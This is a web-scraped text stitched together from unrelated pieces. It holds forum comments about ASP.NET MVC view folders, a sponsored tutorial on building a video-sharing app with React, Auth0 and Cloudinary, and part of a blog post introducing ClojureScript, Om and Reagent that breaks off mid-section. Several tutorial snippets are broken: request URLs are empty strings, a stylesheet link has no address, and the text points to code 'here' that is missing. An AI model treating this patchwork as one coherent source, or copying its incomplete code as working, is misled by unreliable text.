Good tip. Agreed on the 'never break this rule' bit. Except I break it. My User, Products, etc controllers all, er, control their own Admin actions rather than making a different AdminUser, AdminProducts, etc controller, so I do sub-folder those views. So rather than having a index.aspx and an admin_index.aspx in the same folder. I have an index.aspx and an admin/index.aspx, and I use View("admin/index") in the admin_index() action. Breaking the rules? Sure, a little, but it's still crystal clear.
Hi,
yesterday I did a post on my Blog in german language to show how to implement a custom viewlocator which only defines another target folder for the views. In my example its '/MVC/Views'.
Maybe you want to complete your blog post by mentioning this approach.
Here is my blogpost:
blog.dotnet-expert.de/.../ImplementierenEinesEigenenViewLocatorsF%c3%bcrASPNetMVC.aspx
Greet,
Jens
Thanks for stressing the convention. I think it is really important have this been an extreme case for drifting from the convention.
I had to include 'Views' in the path to get this to work:
@"~\Views\Confusing\ButWorks.aspx"
I landed on this post because I'm trying to do what Jens is doing - it would be nice to have a configurable root directory, rather than assuming the root of the web site.
For example, I am trying to have the MVC run under an /admin/ directory, but nowhere else in the web site.
Jens' solution actually is pretty good! Thanks for the discussion!
Build a Mini Netflix with React in 10 Minutes
Developers are constantly faced with the challenge of building complex products every single day, and there are constraints on the time needed to build out the features of these products.
MVP Challenge
An excited entrepreneur just approached you to build a video service: a service where users can quickly upload short videos and share them on Twitter for their friends to view. Let's list out the features of this app.
Features
- Users should be able to sign up and log in.
- Registered/Logged-in users should be able to upload short videos of about 20 - 30 seconds.
- Registered/Non-registered users should be able to view all uploaded videos on the platform on a dashboard.
- Users should be able to share any of the videos on twitter.
Now, here’s the catch! T’challa of Wakanda wants to invest in some startups today, so the entrepreneur needs to demo the MVP of the video service in 10 minutes from now.
I know you are screaming your heart out right now. It's totally okay to cry and let the world know about your problems and challenges, but after all that shedding of tears, will the app be ready in 8 minutes? Well, sorry - tears can't build an app!
Solution
It’s possible to build the MVP our entrepreneur is asking for. Let me show you how! Ready your editor, your command line and anxious fingers. Let’s get to work!!!
1. Flesh Out The App
We’ll use React to build out the app. Facebook has a tool, create-react-app, that can scaffold a progressive web app out of the box in less than a minute. If you don’t have it installed, install it first, then run the commands below in your terminal:
```shell
create-react-app miniflix
cd miniflix
```
Go ahead and open up `public/index.html`. Pull in Bootstrap and add it just after the link to the favicon.
… <link href="" rel="stylesheet"> …
2. Set up Authentication & Views
Go ahead and install the following packages from your terminal:
npm install auth0-js react-router@3.0.0 jwt-decode axios
- auth0-js - For authentication
- react-router - For routing within our app
- jwt-decode - For decoding the JSON Web Token in our app
- axios - For making network requests
Open up your src directory and create a components and utils folder. In the utils folder, create a file, AuthService.js and add the code here to it. I explained how to handle the authentication in this tutorial, so check it out to ensure you are on the right track.
We’ll create 4 components in the components folder: Callback.js, Display.js, Nav.js and Upload.js.
The Callback component basically stores our authentication credentials and redirects back to the upload route in our app.
The Display component will be the dashboard for viewing all videos.
The Nav component will be the navigation that all pages in the app will share.
The Upload component will handle uploading of videos by registered users.
Add this piece of code to components/Callback.js:

```javascript
import { Component } from 'react';
import { setIdToken, setAccessToken } from '../utils/AuthService';

class Callback extends Component {
  componentDidMount() {
    setAccessToken();
    setIdToken();
    window.location.href = "/";
  }

  render() {
    return null;
  }
}

export default Callback;
```
Add this piece of code to components/Nav.js:

```javascript
import React, { Component } from 'react';
import { Link } from 'react-router';
import { login, logout, isLoggedIn } from '../utils/AuthService';
import '../App.css';

class Nav extends Component {
  render() {
    return (
      <nav className="navbar navbar-default">
        <div className="navbar-header">
          <Link className="navbar-brand" to="/">Miniflix</Link>
        </div>
        <ul className="nav navbar-nav">
          <li>
            <Link to="/">All Videos</Link>
          </li>
          <li>
            { isLoggedIn() ? <Link to="/upload">Upload Videos</Link> : '' }
          </li>
        </ul>
        <ul className="nav navbar-nav navbar-right">
          <li>
            { isLoggedIn()
                ? <button className="btn btn-danger log" onClick={() => logout()}>Log out</button>
                : <button className="btn btn-info log" onClick={() => login()}>Log in</button>
            }
          </li>
        </ul>
      </nav>
    );
  }
}

export default Nav;
```
In the Nav component, you must have observed that we imported a css file. Open the App.css file and add this code here to it.
Add this piece of code to components/Display.js:
```javascript
import React, { Component } from 'react';
import { Link } from 'react-router';
import Nav from './Nav';
import { isLoggedIn } from '../utils/AuthService';
import axios from 'axios';

class Display extends Component {
  render() {
    return (
      <div>
        <Nav />
        <h3 className="text-center"> Latest Videos on Miniflix </h3>
        <hr/>
        <div className="col-sm-12">
        </div>
      </div>
    );
  }
}

export default Display;
```
Add this piece of code to components/Upload.js:
```javascript
import React, { Component } from 'react';
import { Link } from 'react-router';
import Nav from './Nav';

class Upload extends Component {
  render() {
    return (
      <div>
        <Nav />
        <h3 className="text-center">Upload Your 20-second Video in a Jiffy</h3>
        <hr/>
        <div className="col-sm-12">
          <div className="jumbotron text-center">
            <button className="btn btn-lg btn-info"> Upload Video</button>
          </div>
        </div>
      </div>
    );
  }
}

export default Upload;
```
Lastly, open up index.js and replace it with the code here to set up your routes.
Now, when you run your app with `npm start`, you should have views like this:
3. Upload Videos
We need a storage space for the videos our users will upload. Cloudinary is a cloud-based service that provides an end-to-end image and video management solution including uploads, storage, administration, manipulation and delivery. Head over to Cloudinary.com and create an account for free.
Let’s make use of Cloudinary’s Upload Widget. This widget allows you to upload videos or any type of file from your local computer, facebook, dropbox and Google Photos. Wow, very powerful. And the integration is seamless.
Go ahead and reference the cloudinary widget script in your index.html:
<script src="//widget.cloudinary.com/global/all.js" type="text/javascript"></script>
Note: You can add it just after the links.
Now in Upload.js, modify the code to look like this:
```javascript
import React, { Component } from 'react';
import { Link } from 'react-router';
import Nav from './Nav';

class Upload extends Component {

  uploadWidget = () => {
    window.cloudinary.openUploadWidget(
      {
        cloud_name: 'cloud_name',
        upload_preset: 'unsigned-preset',
        tags: ['miniflix'],
        sources: ['local', 'url', 'google_photos', 'facebook', 'image_search']
      },
      function(error, result) {
        console.log("This is the result of the last upload", result);
      });
  }

  render() {
    return (
      <div>
        <Nav />
        <h3 className="text-center">Upload Your 20-second Video in a Jiffy</h3>
        <hr/>
        <div className="col-sm-12">
          <div className="jumbotron text-center">
            <button onClick={this.uploadWidget} className="btn btn-lg btn-info"> Upload Video</button>
          </div>
        </div>
      </div>
    );
  }
}

export default Upload;
```
In the code above, we added a third argument, tags. Cloudinary provides this for automatic video tagging. Every video that is uploaded to this app will be automatically tagged, miniflix. In addition, you can provide as many tags as you want. This feature is very useful when you want to search for videos too!
In the uploadWidget function, we called the cloudinary.openUploadWidget function and attached it to the “Upload Video” button. When the user clicks the button, it opens the widget. Replace the cloud_name & upload_preset values with your credentials from Cloudinary dashboard.
Sign in to your app, head over to the upload videos route and try uploading a video.
Upload Widget
Uploading the video...
It uploads the video straight to Cloudinary and returns a response object about the recently uploaded video that contains many parameters, such as the unique public_id, secure_url, url, original_filename, thumbnail_url, created_at, duration and so many others.
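To do something useful with that response, you can pluck out the fields you need inside the widget's callback. Here is a sketch - the `sample` object below is made up for illustration, but its field names are the ones listed above:

```javascript
// Pick out the fields we care about from one upload result entry.
// Field names (public_id, secure_url, ...) follow Cloudinary's upload
// response; adjust if your widget version nests them differently.
function extractVideoInfo(uploaded) {
  return {
    id: uploaded.public_id,
    url: uploaded.secure_url,
    thumbnail: uploaded.thumbnail_url,
    seconds: uploaded.duration,
    createdAt: uploaded.created_at
  };
}

// A hypothetical entry, shaped like what the callback logs:
const sample = {
  public_id: 'miniflix/abc123',
  secure_url: 'https://res.cloudinary.com/demo/video/upload/abc123.mp4',
  thumbnail_url: 'https://res.cloudinary.com/demo/video/upload/abc123.jpg',
  duration: 22.4,
  created_at: '2017-08-01T10:00:00Z'
};

console.log(extractVideoInfo(sample).id); // 'miniflix/abc123'
```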
4. Display Videos
We need a dashboard to display all the videos uploaded for users to see at a glance. Here, we will make use of Cloudinary’s react component. Install it:
npm install cloudinary-react
Now, open up components/Display.js and modify the code to be this below:
```javascript
import React, { Component } from 'react';
import { Link } from 'react-router';
import Nav from './Nav';
import { isLoggedIn } from '../utils/AuthService';
import { CloudinaryContext, Transformation, Video } from 'cloudinary-react';
import axios from 'axios';

class Display extends Component {

  state = { videos: [] };

  getVideos() {
    axios.get('')
      .then(res => {
        console.log(res.data.resources);
        this.setState({ videos: res.data.resources });
      });
  }

  componentDidMount() {
    this.getVideos();
  }

  render() {
    const { videos } = this.state;
    return (
      <div>
        <Nav />
        <h3 className="text-center"> Latest Videos on Miniflix </h3>
        <hr/>
        <div className="col-sm-12">
          <CloudinaryContext cloudName="unicodeveloper">
            {
              videos.map((data, index) => (
                <div className="col-sm-4" key={index}>
                  <div className="embed-responsive embed-responsive-4by3">
                    <Video publicId={data.public_id} width="300" height="300" controls></Video>
                  </div>
                  <div> Created at {data.created_at} </div>
                </div>
              ))
            }
          </CloudinaryContext>
        </div>
      </div>
    );
  }
}

export default Display;
```
In the getVideos code above, we take advantage of a very slick Cloudinary trick that grabs all videos sharing a particular tag with a single request. Check it out again:
So if we had a tag like `vimeo`, our URL would end up with .../vimeo.json. So in the code below, we get all the videos and store them in the `videos` state.
```javascript
axios.get('')
  .then(res => {
    console.log(res.data.resources);
    this.setState({ videos: res.data.resources });
  });
```
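The URL that was stripped from the snippet above follows Cloudinary's client-side list pattern, `https://res.cloudinary.com/<cloud_name>/video/list/<tag>.json` - my assumption here, based on Cloudinary's `list` delivery type, which has to be enabled for the account. A tiny helper makes the pattern explicit:

```javascript
// Build the JSON listing URL for all videos sharing a tag.
// Assumes Cloudinary's `list` delivery type is enabled for the account.
function tagListUrl(cloudName, tag) {
  return 'https://res.cloudinary.com/' + cloudName + '/video/list/' + tag + '.json';
}

console.log(tagListUrl('unicodeveloper', 'miniflix'));
// https://res.cloudinary.com/unicodeveloper/video/list/miniflix.json
```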
The Cloudinary React SDK has 4 major components: Image, Video, Transformation and CloudinaryContext. We are interested in the Video and CloudinaryContext for now. Christian explained how these components work here.
In the render method, we simply just looped through the videos state and passed the public_id of each video into the Cloudinary Video component. The Video component does the job of resolving the public_id from Cloudinary, getting the video url, and displaying it using HTML5 video on the webpage. An added advantage is this: Cloudinary automatically determines the best video type for your browser. Furthermore, it allows the user have the best experience possible by choosing the best from the range of available video types and resolutions.
Run your app, and try to see the list of all videos. It should be similar to this:
You can also manipulate your videos on the fly, with the help of Cloudinary via the Transformation component.
5. Share on Twitter
Go ahead and install the react twitter widget component:
npm install react-twitter-widgets
In the components/Display.js file, import the component at the top:
import { Share } from 'react-twitter-widgets' … …
Now, add this piece of code just after the div that shows the time the video was created.
```javascript
…
…
<Share url={`${data.public_id}.mp4`} />
```
Check your app again. It should be similar to this:
Now, try to tweet.
Simple! It’s really not that hard. The source code for this tutorial is on GitHub.
Conclusion
Our MVP is ready, and our entrepreneur can make the demo. Now sit back, relax and watch your account become flooded with investor money! Wait a minute - there is a 90% probability that you’ll be called to add more features to this app. Well, I think Cloudinary can still help you with more features such as:
- Automatic Subtitles and translation
- Video briefs - a short video preview, based on a few GIF images extracted from the uploaded video.
- Automatic and/or manual video markers - marking specific locations in the video so the user can wait patiently to watch them, or jump directly to these points
- Finding similar videos by automatic video tagging
Cloudinary provides many options for uploading, transforming and optimizing your videos. Feel free to dive in and explore them.
This content is sponsored via Syndicate Ads | http://brianyang.com/build-a-mini-netflix-with-react-in-10-minutes/ | CC-MAIN-2017-47 | refinedweb | 1,764 | 57.67 |
Slashdot
42 ways to Distribute DeCSS
Fabien Penso writes "As you know, lots of homepages have been shut down or had trouble because they were distributing the DeCSS source code (2600.com, ...). This one explains other ways to share it. Basic FTP, HTTP, but also NetBIOS, ssh, DNS, IRC, Corba (!), XDMCP, CVS, etc. All the examples are also running on the server so you can give them a try while you read it." Mirror early, mirror often ;)
This discussion has been archived. No new comments can be posted.
My solution (Score:4)
This would mean that in order to see something that allegedly violates the MPAA's DMCA protections, you'd have to allegedly violate DigitalConvergence's DMCA protection.
Why not... (Score:3)
Oh, wait a minute....
J
it's not illegal... (Score:3)
The only related ruling is the one by Judge Kaplan, which states that it is not allowed in the State of New York to post a hyperlink that targets a copy of the DeCSS source code. Period.
This is not a wide ruling. It does not cover other methods of distribution. It does not cover distribution outside of New York. These things are not illegal, in New York or elsewhere.
Go forth, ye huddled, ye unwashed masses, and buy a DVD today with the express purpose of watching it on a Linux box using DeCSS!
My fantasy (Score:4)
Re:SDMI it! (Score:3)
in the kernel (Score:3)
Let's play Web that DeCSS! (Score:5)
Some notes: you're not allowed to type in anything! That is, you can't find a search engine and type in DeCSS. In my solution below, I need to go through the NY Times. Since I've registered with them, I don't have to type in anything, but if you haven't registered, it won't work. Maybe someone can find a solution that doesn't require registration?
Tattoo You (Score:3)
This would bring all kinds of interesting laws into effect. They can't issue cease and desist orders on someone's skin, nor could they reposses the code.
A "legal" way to distribute DeCSS? (Score:4)
Think it would work?
They missed a few (Score:5)
thank you very much
What you REALLY want to be mirroring.. (Score:4)
Never Not (Score:4)
On another note, I'd like to see this distributed carved into a pumpkin just in time for Autumn. God, the leaves looks beautiful
;)
----
How about this? (Score:4)
/* necessary headers for your system */
/* this should contain an array of char with the contents of decss.c (char *decss) and a constant (DECSS_LEN) stating the length of that array */
#include "decss_bytes.h"
#define ECHO_PORT 7
int main() {
int sockfd, clisock;
struct sockaddr_in server, client;
int addrlen;
char buffer[1024];
int bytes_recv;
int i, rawdata_point = 0;
if (( sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
exit(-1);
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons((u_short) ECHO_PORT);
if (bind(sockfd, (struct sockaddr *) &server, sizeof(server)))
exit(-1);
listen(sockfd, 5);
addrlen = sizeof(client);
clisock = accept(sockfd, (struct sockaddr *) &client, &addrlen);
do {
memset(buffer, '\0', 1024);
bytes_recv = recv(clisock, buffer, 1024, 0);
if (bytes_recv < 1) {
close(clisock);
exit(0);
}
if (bytes_recv > 0) {
for(i = 0; i < bytes_recv; i++)
if(rawdata_point < DECSS_LEN)
buffer[i] ^= decss[rawdata_point++];
send(clisock, buffer, bytes_recv, 0);
}
} while (1);
}
DISCLAIMER: Untested code based on a random
Is this going to end? (Score:3)
Look for it in Pi (Score:4)
Pi is infinitely long, the corresponding sequence must be in there somewhere.
Then just quote Pi starting at blah blah big
for decss.
DeCSS Distribution Through Microsoft Outlook Virus (Score:5)
I say someone writes an Outlook virus that would have compressed copies of the DeCSS source code attached to the message. Like most other Outlook viruses, this one would run without the user knowing, except it would put the DeCSS source code in an area of the hard drive where the user would normally not look and rename it (say C:\WINDOWS\SYSTEM\SKUZIDRV.SYS).
Later, if need be, the file could be retrieved through another e-mail to the same person (assuming they keep the same computer) if we find the number of copies out there dwindling. Again, another Outlook virus that would create a new message, attach the file and send it to a specified address.
Hey, maybe I should patent this! Remote File Storage and Retrieval Using Microsoft Outlook.
SDMI it! (Score:4)
Support the EFF, and help DeCSS (Score:4)
DeCSS is just one of the things they're fighting for (or against). For more info, go to the EFF's web site [eff.org]. It's important that they're supported by the technical community as they fight the stupid but powerful actions of the MPAA and other big entities. I, personally, will be renewing my membership after a far-too-long lapse.
Haaz: Co-founder, LinuxPPC Inc., making Linux for PowerPC since 1996.
Here is my code, and it perform well in Sublime. I dont know why it will cause "Time Limit Exceeded" in Leetcode. Can anyone help me to figure out the problem? Thanks a lot!
```python
def reverseList(self, head):
    if not head:
        return None
    pre = head
    curr = head.next
    while curr:
        temp = curr.next
        curr.next = pre
        pre = curr
        curr = temp
    return pre
```
That code doesn't get "Time Limit Exceeded". It gets "IndentationError".
But even after fixing that, it's clearly wrong, as you build an infinite list (because you never set `head.next` to `None`, so the last element of the reversed list points to the second-to-last).
So it certainly doesn't "perform well in Sublime", as it produces a wrong result. Don't you check your results?
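For reference, here is a minimal sketch of the corrected reversal - the same loop, but with the `pre`/`prev` pointer starting at `None` so the original head correctly terminates the reversed list (the `ListNode` class is the usual LeetCode-style node, written out so the snippet is self-contained):

```python
class ListNode:
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next

def reverse_list(head):
    prev = None              # the old head must end up pointing at None
    curr = head
    while curr:
        nxt = curr.next      # remember the rest of the list
        curr.next = prev     # reverse this link
        prev = curr
        curr = nxt
    return prev              # prev is the new head

# Build 1 -> 2 -> 3, reverse it, and walk the result.
head = ListNode(1, ListNode(2, ListNode(3)))
rev = reverse_list(head)
vals = []
while rev:
    vals.append(rev.val)
    rev = rev.next
print(vals)  # [3, 2, 1]
```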
This post looks at an algorithm by Cohen et al [1] to accelerate the convergence of an alternating series. This method is much more efficient than the classical Euler–Van Wijngaarden method.
For our example, we’ll look at the series

∑_{k=1}^∞ (-1)^k / k²

which converges slowly to -π²/12.
The first algorithm in [1] for approximating the sum using up to the nth term is given by the following Python code.
```python
def cohen_sum(a, n):
    d = (3 + 8**0.5)**n
    d = (d + 1/d)/2
    b = -1
    c = -d
    s = 0
    for k in range(n):
        c = b - c
        s += c*a[k]
        b = (k+n)*(k-n)*b/((k + 0.5)*(k+1))
    return s/d
```
Two notes: First, the algorithm assumes the index of summation starts at zero and so we’ll shift our sum to start at zero. We could just define the first term of the sum to be zero and leave the rest of the series alone, but this would produce worse results; it leads to an initial jump in the series that makes the extrapolation in the method less effective. Second, the alternating term (-1)k is not part of the array passed into the function.
Two graphs, especially the second, will illustrate how well the method of Cohen et al performs compared to the direct method of simply taking partial sums. First, here is the sequence of approximations to the final sum on a linear scale.
And here are the errors in the two methods, plotted on a log scale.
The error from using the direct method of computing partial sums is on the order of 1/n² while the error from using the accelerated method is roughly 1/20.7n. In this example, it would take around 30,000 terms for the direct method to achieve the accuracy that the accelerated method achieves with 10 terms.
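The comparison is easy to reproduce numerically. Here is a self-contained sketch that repeats `cohen_sum` from above; note that the algorithm approximates ∑_{k≥0} (-1)^k a_k, which for these shifted terms equals +π²/12, the negative of the original series' limit:

```python
import math

def cohen_sum(a, n):
    d = (3 + 8**0.5)**n
    d = (d + 1/d)/2
    b = -1
    c = -d
    s = 0
    for k in range(n):
        c = b - c
        s += c*a[k]
        b = (k+n)*(k-n)*b/((k + 0.5)*(k+1))
    return s/d

n = 10
a = [1/(k+1)**2 for k in range(n)]   # terms shifted to start at index zero
target = math.pi**2 / 12             # value of the alternating sum of these terms

direct = sum((-1)**k * a[k] for k in range(n))
print(abs(direct - target))          # on the order of 1e-3: slow convergence
print(abs(cohen_sum(a, n) - target)) # many orders of magnitude smaller
```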
Note that accelerating convergence can be a delicate affair. Different acceleration methods are appropriate for different sums, and applying the wrong method to the wrong series can actually slow convergence as illustrated here.
More on series acceleration
[1] Henri Cohen, Fernando Rodriguez Villegas, and Don Zagier. Convergence Acceleration of Alternating Series. Experimental Mathematics 9:1, page 3
2 thoughts on “Accelerating an alternating series”
I was curious if there was a way to calculate d_n that makes it more obviously an integer. The d_n satisfy a three term recurrence: d_{n+1} = 6*d_n – d_{n-1}, with initial conditions d_1 = 1, d_2 = 3, so you can get the nth term from a matrix power:
[1 0] * [6 -1; 1 0]^n * [3; 1]
where the nth power of the matrix can be computed efficiently with the power-by-squaring algorithm. This parallels a similar strategy for computing Fibonacci numbers.
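That is easy to check in code - a sketch in plain Python integers, indexed so that d₀ = 1 and d₁ = 3 (the comment's d₁ and d₂):

```python
def mat_mul(A, B):
    # 2x2 integer matrix product
    return [[A[0][0]*B[0][0] + A[0][1]*B[1][0], A[0][0]*B[0][1] + A[0][1]*B[1][1]],
            [A[1][0]*B[0][0] + A[1][1]*B[1][0], A[1][0]*B[0][1] + A[1][1]*B[1][1]]]

def mat_pow(A, n):
    # power by squaring: O(log n) matrix multiplications
    R = [[1, 0], [0, 1]]
    while n:
        if n & 1:
            R = mat_mul(R, A)
        A = mat_mul(A, A)
        n >>= 1
    return R

def d_exact(n):
    # d_0 = 1, d_1 = 3, d_{n+1} = 6*d_n - d_{n-1}, in exact integer arithmetic
    M = mat_pow([[6, -1], [1, 0]], n)
    return M[1][0]*3 + M[1][1]*1

print([d_exact(n) for n in range(6)])  # [1, 3, 17, 99, 577, 3363]
```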
This is fantastic thanks!
I’ve been looking for comprehensible series acceleration techniques for a while, and other than Aitken this is the only one I’ve found that makes any sense to me.
Just dropped a PR to compute this; the performance is astonishing.
A binary search or half-interval search algorithm finds the position of a specified value (the input "key") within a sorted
array. In each step, the algorithm compares the input key value with the key value of the middle element of the array. If the keys match,
then a matching element has been found so its index, or position, is returned. Otherwise, if the sought key is less than the middle element's
key, then the algorithm repeats its action on the sub-array to the left of the middle element or, if the input key is greater, on the
sub-array to the right. If the remaining array to be searched is reduced to zero, then the key cannot be found in the array and a special
"Not found" indication is returned.
package com.java2novice.algos;
public class MyBinarySearch {
public int binarySearch(int[] inputArr, int key) {
int start = 0;
int end = inputArr.length - 1;
while (start <= end) {
int mid = (start + end) / 2; // note: start + (end - start) / 2 avoids int overflow for very large arrays
if (key == inputArr[mid]) {
return mid;
}
if (key < inputArr[mid]) {
end = mid - 1;
} else {
start = mid + 1;
}
}
return -1;
}
public static void main(String[] args) {
MyBinarySearch mbs = new MyBinarySearch();
int[] arr = {2, 4, 6, 8, 10, 12, 14, 16};
System.out.println("Key 14's position: "+mbs.binarySearch(arr, 14));
int[] arr1 = {6,34,78,123,432,900};
System.out.println("Key 432's position: "+mbs.binarySearch(arr1, 432));
}
}
Key 14's position: 6
Key 432's position: 4
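For comparison, the JDK ships a built-in binary search, `java.util.Arrays.binarySearch`. It returns the index when the key is found, and `-(insertionPoint) - 1` when it is not:

```java
import java.util.Arrays;

public class BuiltInSearchDemo {
    public static void main(String[] args) {
        int[] arr = {2, 4, 6, 8, 10, 12, 14, 16};
        // Returns the index when the key is present...
        System.out.println("Key 14's position: " + Arrays.binarySearch(arr, 14));
        // ...and -(insertionPoint) - 1 when it is absent.
        System.out.println("Key 5's position: " + Arrays.binarySearch(arr, 5));
    }
}
```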
S-exps in your browser
The front end of the pool
I've been interested in reactive JavaScript for a while. At memoways, we strive to build snappy user interfaces for clients who like to interact with their data with as little latency as possible.
In the past two years, I learned front-end development on-the-fly, as the needs of the clients required it. Two years ago, I was still using jQuery. Then, I discovered space-pen thanks to my colleague Nicolas. It was nice to have proper 'view' objects, and use jQuery's event system to have messages propagate throughout a hierarchy.
But state management was still an issue. Anything a tiny bit complex broke way too easily. Surely with a better code organization, I might've been able to hold on to space-pen longer (after all, it's used by Atom), but no matter how much effort you put into it, space-pen isn't really suited to rapid prototyping, something you need to do a lot of when you touch domains like dataviz.
Then I discovered Ractive.js, by the wonderful team at The Guardian. It seemed to me like a version of React without the baggage. Two-way binding is magical when it works: just store dynamic properties within the data object, use the getter/setter methods (or built-into-JS accessors if you're feeling adventurous and independent from all IE compatibility needs) and everything updates smoothly.
However, Ractive proved very hard to debug. Its custom sort-of-HTML parser (as is the tradition with almost all reactive frameworks nowadays) didn't give much context as to where errors were, when I last tried it. I had to quickly hack support for "printing surrounding code when a syntax error occurs" into my copy, just so my app wouldn't collapse.
Error reporting is often overlooked by new language implementors. "You should be writing correct code in the first place!", right? The truth is: good error reporting & debugging support is essential - when refactoring, tests are only useful to a degree. After that, you're left to the whims of whatever compiler, processor, macro expander you're using.
Enter ClojureScript
I had been hearing good stuff about Om for a while. I think it's one of the recent Prismatic blog posts that sold me on it. That was before I learned that they're pretty much the only high-profile company using ClojureScript in production!
But at this point, I was fed up with suddenly-breaking Ractive code, and anything new was good to distract me of my daily dev problems. Turns out, Om is probably awesome, but it's too verbose for me.
Here's what the start of Om's tutorial looks like:
```clj
(om/root
  (fn [app owner]
    (reify om/IRender
      (render [_]
        (dom/h1 nil (:text app)))))
  app-state
  {:target (. js/document (getElementById "app"))})
```
Now, when you're discovering a new paradigm and a new language, that's a bit steep.
Let's walk through things step by step. First off, it's S-expressions all the way down. That means instead of writing:
```js
log("A completely unremarkable number: ", 40 + 2)
```
You'd write:
```clj
(log "A completely unremarkable number: " (+ 40 2))
```
Yes, even `+` looks like a function call. It's handy, too, because you can pass it any number of arguments, unlike the infix version:
```clj
(log "Look, ma" (+ 1 2 3 4 5 6))
```
Same goes for `=`, and lots of other primitives.
So, now we can see that we're calling something called `om/root`. The slash is Clojure's way of saying it likes to keep things nice and tidy, arranged into namespaces. In this case, what they don't tell you is that at the top of this file there is probably something like:
```clj
(ns myapp.core
  (:require [om.core :as om]))
```
And so, whenever we type `om/something`, we refer to `something` within the `om.core` namespace.
Note that ClojureScript allows you to `refer` symbols so that you can use them without any qualification; for example, we could've done the following:
```clj
(ns myapp.core
  (:require [om.core :as om :refer [root]]))

(root arg1 arg2 arg3)
```
You see what I'm getting at.
Then we have array (vector) syntax:
```clj
(def heroes ["Samus" "Peach" "Sarah Kerrigan"])
```
Like arguments to a function, arrays are space-separated. Maps are about the same, except you need to have an even number of elements and the odd ones are the keys.
Usually we'll use keywords instead of strings as map keys:
```clj
(def langs {:clojure "JVM"
            :haxe    "Neko"
            :vala    "GLib"})
```
As for function definitions, they look like a call as well:
```clj
(fn [a b c]
  (log "In a function somewhere!")
  (+ a b c))
```
Now with our newly-acquired notions, let's go back to our original code:
```clj
(om/root
  (fn [app owner]
    (reify om/IRender
      (render [_]
        (dom/h1 nil (:text app)))))
  app-state
  {:target (. js/document (getElementById "app"))})
```
We have a call to `om/root`, and the first argument is a function:
```clj
(fn [app owner]
  (reify om/IRender
    (render [_]
      (dom/h1 nil (:text app)))))
```
The function returns a type - really, an interface implementation if you ask me:
```clj
(reify om/IRender
  (render [_]
    (dom/h1 nil (:text app))))
```
So, we implement the `om/IRender` interface, and it has only one method:
```clj
(render [_]
  (dom/h1 nil (:text app)))
```
It takes one argument, which we bind to `_` to mark that we really don't care about it (in this case it's the local state of the component, but let's not get into this...)
And then we call the `h1` DOM construction function, with no special options (`nil` is Clojure for null), and then the value stored under the key `:text` in `app`.
In the interest of clarity, `(:text app)` is roughly equivalent to `(get app :text)`, or `app['text']` in JavaScript.
The second argument to `om/root` is simply `app-state`, an atom (we'll get back to that).
And the third argument is a map, with a single key, `:target`, whose value is:
```clj
(. js/document (getElementById "app"))
```
That's ClojureScript/JavaScript interoperability - equivalent to the following JavaScript:
```js
document.getElementById('app')
```
Now that we've learned a few basics to be able to read ClojureScript code, what does this actually do? Well, anything implementing the `om/IRender` interface is an Om component, and calling `om/root` mounts it to a DOM element somewhere. Somewhere in our HTML, we probably have this:
```html
<div id="app"></div>
```
And in there we'll have an `h1` tag containing whatever is in `(:text app)`.
So then, how do we put stuff in the app state? As we mentioned earlier, `app-state` is an atom. We could define it like this:
(def app-state (atom {:text "Initial text"}))
And then, if we want to change the text, we can do:
clj
(swap! app-state assoc :text "New text!")
Which is really just a shorthand for:
clj
(swap! app-state #(assoc % :text "New text!"))
Itself a shorthand for:
clj
(swap! app-state (fn [state] (assoc state :text "New text!")))
What does
swap! do? Well, an atom is basically a reference to a value. The
value itself is immutable, as all Clojure data structures, but we can change
the reference to something else.
So, wherever in Ractive you'd do `state.set(key, value)`, changing the state itself, in ClojureScript you'd rather swap the reference to a slightly changed version of the state.
However, the whole state isn't copied - the parts that didn't change are immutable as well, so they're just referenced from the new data structure.
Let's take a more complex state as an example.
```clj
(let [state (atom {:a [1 2 3]
                   :b {:first-name "John"
                       :last-name "Doe"}})]
  (log "Old state: " (pr-str @state))
  (swap! state assoc :a [4 5 6])
  (log "New state: " (pr-str @state)))
```
In this example, not only are the old and new `(:b @state)` value-equal, but they're also reference-equal - they're the same data structure, at the same place in memory.
Note: `@some-atom` is the atom dereference operation. It evaluates to the value the atom references, rather than the atom itself. And `pr-str` is basically a `toString`.
So, whenever the state atom is changed, comparing the old state and the new state is very fast - still in our "John Doe" example above, there's no need to compare whether `(:first-name (:b @state))` has changed, for example: we can see that `(:b @state)` still has the same address, so all the substructure has to be the same, because of immutability.
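A quick way to see this structural sharing in action - a sketch using `identical?`, which checks reference equality (using the same `log` helper as above):

```clj
(let [old-state {:a [1 2 3]
                 :b {:first-name "John" :last-name "Doe"}}
      new-state (assoc old-state :a [4 5 6])]
  ;; :a was replaced, so the vectors differ...
  (log (identical? (:a old-state) (:a new-state)))  ;; false
  ;; ...but :b was untouched, so both maps point at the very same object
  (log (identical? (:b old-state) (:b new-state)))) ;; true
```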
Even when the app state gets complicated, small updates to part of the state tree are still fast, because it's inexpensive to find out which parts of the tree are changed. Hence, only the minimal amount of re-rendering is done.
Exit Om
It might not seem like much, but writing all those `reify` forms and having to require and call methods for every DOM element gets old really quick. Call me impatient, but I knew there was something simpler lurking around the corner.
And there was! Reagent provides a much simpler interface to React. So, in the same ballpark as Om but without all the running around in circles.
In Reagent, components are simply functions, and HTML tags are specified as keywords, with a Hiccup-like syntax.
For example, I love FontAwesome icons. Here's a simple component that displays the icon of your choice:
```clj
(defn fa-icon [icon]
  [:i {:class (str "fa fa-" icon)}])
```
Using it is as simple as any HTML tag:
```clj
(defn profile [user]
  [:div.user
   [:h2 (:name @user)]
   [:p (:bio @user)]
   [:span.button {:on-click #(follow user)}
    "Follow " (:name @user)
    [fa-icon "star"]]])
```
That would produce HTML like:
```html
<div class="user">
  <h2>The Jester</h2>
  <p>Some obscure hacker at some point in the internet's history.</p>
  <span class="button">
    Follow The Jester
    <i class="fa fa-star"></i>
  </span>
</div>
```
I was pretty happy with Reagent, and wrote the UI for the memoways issue tracking system in it. It works very well, and I can prototype quickly, although errors are still kind of painful.
ClojureScript: the bad
But now I'm seriously looking at ClojureScript alternatives.
I was okay with having to learn a completely new build tool, leiningen. In fact, it's really nice to have mostly one tool to interact with for the whole language.
I was okay with ugly JavaScript interop, leading to code like this:
```clj
(.getElementById js/document (.-value (.-target e)))
```
I was okay with syntax errors yielding 50-lines-long stacktraces in my console.
I was even okay with the REPL taking around 4s to start (on a 2.2Ghz Core i7 with a recent SSD).
But I'm not okay with the completely erratic behavior of `lein-cljsbuild` and the Google Closure compiler.
Let me get you up-to-speed on the whole ClojureScript/Closure shenanigans.
